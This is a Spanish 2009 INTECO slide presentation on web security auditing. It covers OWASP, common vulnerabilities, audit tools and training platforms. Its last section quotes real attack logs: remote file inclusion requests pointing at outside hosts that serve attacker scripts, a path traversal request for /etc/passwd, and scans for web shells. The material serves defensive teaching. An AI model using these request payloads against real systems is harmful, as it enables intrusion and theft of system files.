SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009

SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009

Índice Seguridad Web: Auditorías y Herramientas 0. Presentación INTECO 1. Auditorías Web 1) Introducción a la Seguridad Web 2) OWASP & WASC 3) Vulnerabilidades Web hoy en día 4) Procedimientos y técnicas de auditoria Web 2. Experiencias de INTECO-CERT 1) Experiencias de colaboración de INTECO-CERT 2

Índice Seguridad Web: Auditorías y Herramientas 3. Herramientas de auditoría Web 1) Aplicaciones comerciales de auditoria para Web. 2) Aplicaciones gratuitas de auditoria para Web. 3) Plataformas de aprendizaje 4. Otras fuentes de Información 1) El otro lado: trazas de un ataque Web 2) Concursos y Retos 3

El Instituto Nacional de Tecnologías de la Comunicación, INTECO 4

Actuaciones en e-confianza de INTECO 1. Qué es INTECO? Instituto Nacional de Tecnologías de la Comunicación Sociedad estatal adscrita al MITYC a través de SETSI Instrumento del Plan Avanza para el desarrollo de la S.I Pilares: Investigación aplicada, prestación de servicios y formación OBJETIVOS Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TIC Alta localización de conocimiento intensivo y conexión con otros centros internacionales. 5

Actuaciones en e-confianza de INTECO 2. Líneas estratégicas de actuación e-confianza (Seguridad) Calidad SW Accesibilidad Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos Centro Demostrador de Tecnologías de la Seguridad Observatorio de Seguridad de la Información Laboratorio Nacional de Calidad Formación Promoción de proyectos TIC Promoción de estándares y normalización Centro de Referencia en Accesibilidad y Estándares Web Centro Nacional de Tecnologías de la Accesibilidad Área de I+D+i en Accesibilidad Web. Centro de Gestión de servicios públicos interactivos - TDT Ciudadanía e Internet Innovación TIC y Competitividad PYME 6

Actuaciones en e-confianza de INTECO 3. Proyectos en e-confianza Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad Informática Coordinar la investigación aplicada y la formación especializada en el ámbito de la seguridad TIC Centro de referencia en Seguridad Informática a nivel nacional INTECO CERT Centro Demostrador de Tecnologías de la Seguridad Observatorio de la Seguridad de la información 7

INTECO-CERT Objetivos Impulsar la confianza en las nuevas tecnologías promoviendo su uso de forma segura y responsable Minimizar los perjuicios ocasionados por incidentes de seguridad, accidentes o fallos facilitando mecanismos de prevención y reacción adecuados Prevenir, informar, concienciar y formar a la pyme y el ciudadano proporcionando información clara y concisa acerca de la tecnología y el estado de la seguridad en Internet. 8

INTECO-CERT Servicios de INTECO-CERT en materia de seguridad: http://cert.inteco.es Servicios de Información: Suscripción a boletines y alertas Actualidad, noticias y eventos Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos por correo electrónico, información sobre correo electrónico no deseado. Servicios de Formación: guías, manuales, cursos online Servicios de Protección: útiles gratuitos y actualizaciones de software Servicios de Respuesta y Soporte: Gestión y resolución de Incidencias Gestión de Malware o código malicioso Fraude electrónico Asesoría Legal Foros 9

INTECO-CERT Servicios de Información: Vulnerabilidades y Malware Colaboración con NIST-NVD Traducción de más de 33.800 vulnerabilidades Clasificación por nivel de severidad Aportación de vulnerabilidades descubiertas. 10

INTECO-CERT Servicios de Información: Virus en el correo electrónico. Red de sensores de Virus. Más de 170 sensores más de 100 millones de correos procesados al día. 0,40% de detección de correos infectados de virus informáticos en más de 40.000 millones de correos analizados. Información de detecciones de malware en correo en https://ersi.inteco.es/ 11

INTECO-CERT Servicios de Información: SPAM. Red de sensores de SPAM. https://ersi.inteco.es/ CORREOS ELECTRÓNICOS 12

INTECO-CERT Servicios de Formación y Protección. Formación Guías y Manuales. Buenas prácticas. Preguntas frecuentes. Protección Descarga de útiles gratuitos de seguridad Información sobre actualizaciones de software, parches etc.. Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos Móviles. 13

INTECO-CERT Servicios de Formación y Protección. Protección Avisos y alertas de seguridad, a través de boletines y web. 14

INTECO-CERT Servicios de Respuesta y Soporte. Gestión de incidencias o problemas de seguridad Resolución y ayuda ante incidentes de seguridad. Análisis y recomendaciones de seguridad. Sistemas de detección de malware en la red. Desarrollo de herramientas propias: CONAN. Configuration Analisys. Recoge información del PC susceptible de ser modificada por código malicioso y cualquier otra información que nos sirva para determinar si el PC está o no correctamente configurado. 15

INTECO-CERT Servicios de Respuesta y Soporte. Asesoría Legal Buzón de Consultas, Foros de Usuarios y Asesoría Legal de Derecho en las Nuevas Tecnologías Difusión de Guías de buenas prácticas y Manuales de concienciación y formación sobre legislación y normativas en materia de Seguridad TIC. Guías de implantación de medidas que faciliten el cumplimiento de las disposiciones legales. legal@cert.inteco.es 16

INTECO-CERT Servicios de Respuesta y Soporte. Lucha contra el Fraude Información a los usuarios sobre todos los tipos de fraude electrónico a través de foros y buzón fraude@cert.inteco.es. Repositorio de fraude de INTECO con información estructurada de los fraudes detectados creación de inteligencia sobre fraude electrónico en España. Colaboración con entidades financieras, FCSE, ISPs y registradores de dominios. 17

Centro Demostrador de Tecnologías de la Seguridad Objetivos Fomentar y difundir el uso de tecnologías de seguridad de la información Catálogo de Soluciones y Proveedores Análisis de productos de seguridad Formación a la PYME Difusión e impulso de la tecnología de seguridad Impulso del DNI electrónico y SGSI http://demostrador.inteco.es 18

Centro Demostrador de Tecnologías de la Seguridad Catálogo de empresas y soluciones Catalogación de todos los actores del mercado, datos de proveedor. Catalogación de los productos que ofrecen, datos de producto. Catalogación de los servicios que ofrecen, datos de servicio. Catálogo impreso 19

Centro Demostrador de Tecnologías de la Seguridad Catálogo online 20

Centro Demostrador de Tecnologías de la Seguridad Taxonomía de productos y servicios Productos (31 categorías) Servicios (14 categorías) 21

Centro Demostrador de Tecnologías de la Seguridad Nº DE EMPRESAS DATOS ACTUALES DEL CATÁLOGO Nº DE SOLUCIONES 557 1007 OFERTA ACTUAL DE PRODUCTOS Autenticación 104 Anti - Malware 64 Sistemas de seguridad de datos 45 Filtro y control de contenidos 38 OFERTA ACTUAL DE SERVICIOS Políticas de Seguridad 128 Planificación e implantación de infraestructuras 107 Cumplimiento con la legislación (LOPD,..) 102 Certificación y Acreditación 61 22

Centro Demostrador de Tecnologías de la Seguridad Análisis y demostración de productos y soluciones de seguridad Ámbito y alcance de la aplicación Conocer sus capacidades y características Análisis funcional y estructural Ayuda a los fabricantes Laboratorio de nuevos productos y tecnologías Generar recomendaciones 23

Centro Demostrador de Tecnologías de la Seguridad Difusión e impulso de la tecnología de seguridad Estudio de mercado sobre las soluciones de seguridad TIC Identificar nichos en la industria TIC española Promoción de alianzas Potenciar la tecnología de seguridad española y promover su desarrollo Acuerdos con entidades de otros países 24

Centro Demostrador de Tecnologías de la Seguridad Promoción de alianzas Empresas: convenios de colaboración 2008 2009 50 convenios 8 convenios Asociaciones: relación con todas las patronales del sector. Actores proactivos: banca, universidades, 25

Centro Demostrador de Tecnologías de la Seguridad Eventos propios I ENISE II ENISE 26

Centro Demostrador de Tecnologías de la Seguridad Formación a la Pyme Identificación de amenazas Elaboración de contenidos Impulso cultura de seguridad Impulso del uso de tecnologías de seguridad Jornadas celebradas 25 Pymes sensibilizadas 2200 Media de asistentes 90 27

Programa de Impulso de los SGSI (Sistema de Gestión de Seguridad de la Información) Líneas Generales Seleccionan CATÁLOGO ORGANISMOS CERTIFICACIÓN SGSI Colabora con CÁMARAS DE COMERCIO Organizan Colabora JORNADAS Y TALLERES SGSI PYME INTECO Colabora INTECO recibe la encomienda de Gestión Seleccionan CATÁLOGO EMPRESAS IMPLANTACIÓN SGSI 28

Impulso DNIe: Perfiles de Protección Los Perfiles de Protección son documentos que especifican una solución de seguridad: la creación y verificación de firma electrónica con DNIe: adoptan la legislación y normativa nacional y europea definen el nivel de garantía de seguridad que ofrece una aplicación certificada que cumpla con el perfil Van a servir para desarrollar y certificar aplicaciones de firma con DNIe con garantías de seguridad: Tipo 1: para plataformas TDT, PDA s o teléfonos móviles Tipo 2: para ordenadores personales con S.O. de propósito general Los niveles de garantía de seguridad EAL1 y EAL3 indican la profundidad y rigor exigido en la evaluación de las aplicaciones que se quieran certificar. Unas Guías que facilitarán a los desarrolladores el cumplimiento con los perfiles se podrán descargar del Portal del DNIe de INTECO 29

Resumen de Servicios de econfianza. Servicios prestados a pymes y ciudadanos: Servicios gratuitos de Información a través del portal web, RSS o suscripción Actualidad, noticias y eventos Alertas y estadísticas en tiempo real sobre la seguridad en España Servicios gratuitos de Formación en Seguridad de la Información Manuales sobre legislación vigente Configuración de seguridad en sistemas Guías de resolución de problemas de seguridad Buenas prácticas para la prevención de problemas de seguridad Servicios gratuitos de Protección: Catálogo de útiles gratuitos de seguridad Catálogo de actualizaciones de software Servicios gratuitos de Respuesta y Soporte: Gestión y resolución de Incidencias de Seguridad Gestión y soporte ante fraude electrónico Asesoría Legal 30

Contactos INTECO-CERT contacto@cert.inteco.es incidencias@cert.inteco.es fraude@cert.inteco.es legal@cert.inteco.es http://cert.inteco.es Centro Demostrador de Tecnologías de la Seguridad info.demostrador@inteco.es catalogo.demostrador@inteco.es jornadas.pyme@inteco.es http://demostrador.inteco.es 31

Dónde estamos www.inteco.es Sede de INTECO Avda. Jose Aguado 41 Edificio INTECO 24005 LEÓN Tel: (+34) 987 877 189 Fax: (+34) 987 261 016 32

Preguntas? 33

Seguridad Web 34

1. Auditorías Web Introducción a la seguridad Web Problemática de seguridad en las aplicaciones Web Cada vez son aplicativos mas complejos y dinámicos. Resultan fáciles comprometer o atacar. Muchas veces están accesibles desde Internet y forman parte del perímetro de seguridad de la empresa. Se trata de aplicaciones sin visión de la seguridad en su desarrollo. La seguridad en Internet no depende exclusivamente de la seguridad de la red o de los sistemas, sino también de las aplicaciones que están accesibles La seguridad de las aplicaciones Web resulta muy importante y para ello debemos auditarlas y asegurarnos de que no suponen un riesgo para la organización. 35

1. Auditorías Web OWASP: Open Web Application Security Project Qué es OWASP? Fundación sin animo de lucro. Creada en 2001. Independiente de los fabricantes. Formada por voluntarios. Objetivos: Promover la seguridad de las aplicaciones web. Buscar las causas de la inseguridad. Proporcionar soluciones a las amenazas. Crear herramientas, documentación y estándares. 36

1. Auditorías Web OWASP: Open Web Application Security Project Qué hace OWASP? Recursos para equipos de desarrollo. Foros de discusión. Aplicaciones para auditoria y para formación. Documentación y artículos. Proyectos dentro de OWASP: Webscarab: Herramienta para auditoria. WebGoat: Herramienta para formación. OWASP Testing: Metodología. Web Application Penetration Checklist: Documentación. OWASP Guide y Top Ten Project: Documentación. 37

1. Auditorías Web WASC: Web Application Security Consortium Qué es WASC? Participada por la industria, expertos y organizaciones. Foro abierto de participación. Objetivos: Promover estándares de seguridad web. Elaboración de artículos y guías de seguridad web. Compartir el conocimiento sobre las amenazas web. Proyectos: Application Security Scanner Evaluation Criteria. Web Hacking Incidents Database. Distributed Open Proxy Honeypots. Web Security Threat Classification. 38

1. Auditorías Web Vulnerabilidades Web El vector de ataque de las Vulnerabilidades Web son las Peticiones El protocolo HTTP define diversos tipos de peticiones conocidos como métodos, los comunes son los siguientes: OPTIONS: Permite listar todos los métodos permitidos por el servidor. GET: Sirve para solicitar un objeto Web, admite parámetros HEAD: Solicita la cabecera HTTP del servidor Web. POST: Sirve para solicitar un objeto Web, admite parámetros. PUT: Permite enviar un fichero al servidor Web. DELETE: Borra un objeto Web. TRACE: Tiene como finalidad propósitos de depuración. CONNECT: Permite conectar a otro servidor host (proxy, webserver,...). 39

1. Auditorías Web Vulnerabilidades Web Problemática: Autenticación en aplicaciones Web Autenticación anónima (sin autenticación) Autenticación a través de la propia aplicación Web Basada en formularios mediante peticiones de tipo GET / POST Autenticación basada en el protocolo HTTP HTTP Tipo Basic HTTP Tipo Digest Autenticación a través de credenciales del sistema operativo Cuentas de usuario locales o del dominio (AD, ldap,...) Seguridad en función del sistema de ficheros (NTFS,...) 40

1. Auditorías Web Vulnerabilidades Web Ataques a los mecanismos de autenticación en las aplicaciones Web: Captura de credenciales (sniffing o hijacking) Si las credenciales de autenticación no viajan por un canal cifrado (SSL) es posible capturar las credenciales de autenticación utilizadas. Identificación de cuentas de usuario validas Respuestas diferentes cuando el usuario introducido es incorrecto de cuando es la contraseña introducida es incorrecta Denegación de servicio a los mecanismos de autenticación A realizar n intentos de autenticación fallidos y la aplicación no esta correctamente parametrizada es posible bloquear las cuentas de usuario Ataque por Fuerza Bruta o Diccionario Si se combina la identificación de usuario con una incorrecta política de bloqueo de cuentas puede realizarse estos ataques 41

1. Auditorías Web Vulnerabilidades Web Problemática: Gestión de las Sesiones en las aplicaciones Web El protocolo HTTP es un protocolo sin estado, se necesitan identificadores de sesión. La gestión de sesiones es un proceso ligado con el proceso de autenticación de usuario. Se asocia al usuario un identificador de Sesión que este enviara a la aplicación Web en cada petición El identificador de sesión es generalmente una cadena de caracteres generada aleatoriamente El identificador de sesión forma parte de la cabecera HTTP, como Cookie. Aunque es posible enviarlo en peticiones de tipo GET o POST 42

1. Auditorías Web Vulnerabilidades Web Ataques a los mecanismos de gestión de identificadores de Sesión Ataques de interceptación de sesión Existen diferentes ataques de intercepción por ejemplo: sniffing, XSS, SQL injection, etc. Ataques por predicción del identificador Si la cadena de caracteres del identificador no es suficientemente aleatoria puede permitir su predicción Ataques por Fuerza Bruta Si el algoritmo utilizado para la generación del identificador no es suficientemente robusto, puede ser posible obtener una sesión valida por fuerza bruta Ataques de Fijación de sesión Si la aplicación no gestiona la caducidad de las sesiones o asocia siempre la misma sesión a un mismo usuario puede permitir el robo de sesiones por diversos métodos (virus, hijacking, etc) 43

1. Auditorías Web Vulnerabilidades Web Problemática: Validación de caracteres de entrada y salida Incorrecto control de los caracteres en variables de entrada. SQL injection Command Injection Inclusión de código script de servidor. Idap injection Include path Transversal Directory Incorrecto control de los tamaños de las variable de entrada Desbordamientos de Buffer Denegaciones de Servicio Ataques de validación de I/O: El limite es la imaginación 44

1. Auditorías Web Vulnerabilidades Web hoy en dia: El Top 10 de vulnerabilidades de OWASP Cross Site Scripting (XSS). Inyecciones de código. Ejecución de ficheros maliciosos. Manipulación de rutas a objetos. Cross Site Request Forgery (CSRF). Manejo inadecuado de errores. 45

1. Auditorías Web Vulnerabilidades Web hoy en dia: El Top 10 de vulnerabilidades de OWASP Robo de credenciales de sesión o de control de acceso. Almacenamiento de datos inseguro. Comunicaciones por un canal inseguro. Fallo en la ocultación de URLs de gestión. http://www.owasp.org/index.php/top_10_2007 http://www.owasp.org/index.php/top_10_2004 46

1. Auditorías Web Utilización de la herramienta adecuada a cada aplicativo. Metodología de auditoria. OWASP Testing. Web Application Penetration Checklist. OSSTMM. Chequear todos los resultados de las herramientas. Uso de herramientas para localización de URLs ocultas. Conocer en lo posible la aplicación. 47

1. Auditorías Web Documentarse sobre las vulnerabilidades existentes. Uso de distintos patrones de los ataques XSS (Cross Site Scripting) Cheat Sheet - http://ha.ckers.org/xss.html XSSDB attack database - http://www.gnucitizen.org/xssdb/ Captura de evidencias. No realizar denegaciones de Servicio. Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking 48

1. Auditorías Web Es importante no menospreciar las fugas de información en las respuestas del servidor Es necesario validar todos los caracteres de entrada en las variables de peticiones GET y POST Hay que generar identificadores de sesión complejos, con aleatoriedad, enviarlos a través de las Cookies y con caducidad Utilización de contraseñas fuertes. Validar el identificador de sesión en todas las páginas. No almacenar las contraseñas en claro en la Base de Datos. No utilizar variables ocultas que no deseen ser vistas o modificadas por el usuario. 49

2. Experiencias de INTECO-CERT Gestión de incidencias o problemas de seguridad Resolución y ayuda ante incidentes de seguridad. Análisis y recomendaciones de seguridad. Sistemas de detección de malware en la red. Ministerio de Vivienda: A partir de un incidente de seguridad en la pagina web se realizo un análisis exhaustivo de la seguridad de la misma. Foro Internacional de Contenidos Digitales: Revisión de seguridad de la Web del Foro Internacional de Contenidos Digitales (FICOD 2008) del Ministerio de Industria. 50

2. Experiencias de INTECO-CERT Vulnerabilidades más encontradas Vulnerabilidades de SQL injection. Con obtención de usuarios y contraseñas. Incorrecto manejo de sesiones. Posibilidad de saltarse la autenticación y obtener una sesión privilegiada en la aplicación. Incorrecta configuración del servidor. Listado de directorios. Obtención de información sensible del servidor. Acceso a ficheros de logs. Versiones no actualizadas o con vulnerabilidades. Versiones de PHP, del gestor de contenidos, etc. 51

3. Herramientas de auditoría Web Aplicaciones comerciales Características comunes Propósito múltiple (no exclusivas por vulnerabilidad). Capacidad de auditoria ante cualquier tipo de aplicativo. Incorporan utilidades para pruebas manuales. Aspectos Configurables. Proporcionan abundante documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Un elevado precio. 52

3. Herramientas de auditoría Web Acunetix Web Vulnerability Scanner 53

3. Herramientas de auditoría Web IBM Rational AppScan 54

3. Herramientas de auditoría Web HP WebInspect 55

3. Herramientas de auditoría Web Aplicaciones gratuitas Características comunes La mayoría son para un propósito especifico. Tienen limitaciones para algún tipo de aplicativo. Incorporan utilidades para pruebas manuales. Mayor capacidad de configuración. Proporcionan menos documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Son gratis. 56

3. Herramientas de auditoría Web WebScarab 57

3. Herramientas de auditoría Web Paros 58

3. Herramientas de auditoría Web w3af 59

3. Herramientas de auditoría Web Plataformas de aprendizaje: WEBGOAT 60

3. Herramientas de auditoría Web Plataformas de aprendizaje: WEBGOAT Video Soluciones http://yehg.net/lab/pr0js/training/webgoat.php 61

3. Herramientas de auditoría Web Plataformas de aprendizaje: HACKME FOUNDSTONE http://www.foundstone.com/us/resources-free-tools.asp 62

4. Otras fuentes de Información Búsqueda de un objetivo para un ataque GET /horde-3.0.6//readme HTTP/1.1 GET /horde-3.0.7//readme HTTP/1.1 GET /horde-3.0.8//readme HTTP/1.1 GET /email//readme HTTP/1.1 GET /webmail//readme HTTP/1.1 GET /mailz//readme HTTP/1.1 GET /horde2//readme HTTP/1.1 GET //scgi/awstats/awstats.pl HTTP/1.1 GET //scripts/awstats.pl HTTP/1.1 GET //cgi-bin/awstats/awstats.pl HTTP/1.1 GET //cgi-bin/stats/awstats.pl HTTP/1.1 GET //scgi-bin/stats/awstats.pl HTTP/1.1 CONNECT 195.175.37.70:8080 HTTP/1.0 OPTIONS * HTTP/1.0 63

4. Otras fuentes de Información Búsqueda de un objetivo para un ataque GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin0/tbl_select.php HTTP/1.1 GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1 GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin2/read_dump.php HTTP/1.0 GET /phpmyadmin-2.2.3/read_dump.php HTTP/1.0 GET /phpmyadmin/r57.php HTTP/1.1 GET /phpmyadmin/c99.php HTTP/1.1 GET /phpmyadmin/shell.php HTTP/1.1 GET /phpmyadmin/cmd.php HTTP/1.1 GET /w00tw00t.at.isc.sans.mslog:) HTTP/1.1 GET /w00tw00t.at.isc.sans.pwn!t:) HTTP/1.1 GET /w00tw00t.at.isc.sans.dfind:) HTTP/1.1 64

4. Otras fuentes de Información Trazas de un intento de ataque /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera nchjohnstown.com/menu/r7?? HTTP/1.1 /en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a ltervista.org/a.txt?? HTTP/1.1 /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter vista.org/a.txt?? HTTP/1.1 /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft p.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff%ff%ff%ff%ff /1? HTTP/1.1 //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9 0/upload/071011004039p/old? HTTP/1.1 /_vti_bin/owssvr.dll?ul=1&act=4&build=6254&strmver=4&capreq=0 HTTP/1.1 65

4. Otras fuentes de Información Trazas de un intento de ataque GET /includes/ordersuccess.inc.php?&glob=1&cart_order_id=1&glob[rootdir]=http://80.3 4.102.151/joomla/1.gif?/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: Close Host: 85.17.35.X User-Agent: Morfeus Fucking Scanner mod_security-action: 406 HTTP/1.1 406 Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 66

4. Otras fuentes de Información Trazas de un intento de ataque GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/ /ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff%ff%ff%ff%f F/1? HTTP/1.1 Connection: TE, close Host: www.x.com TE: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.808 mod_security-action: 406 HTTP/1.1 406 Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 67

4. Otras fuentes de Información Trazas de un intento de ataque GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0 Connection: Keep-Alive Content-Length: 0 Host: www.x.net User-Agent: Mozilla/4.75 (Nikto/1.35 ) mod_security-action: 406 HTTP/1.1 406 Not Acceptable Connection: close Content-Type: text/html; charset=iso-8859-1 68

4. Otras fuentes de Información CONCURSOS Y RETOS Retos Hacking (I IX) http://elladodelmal.blogspot.com/search/label/reto%20hacking Concurso BSGAME #1 http://blindsec.com:81/ http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1 SecGame SG6Labs http://www.sg6.es/labs/ 69

Preguntas? 70

Muchas gracias 71

www.inteco.es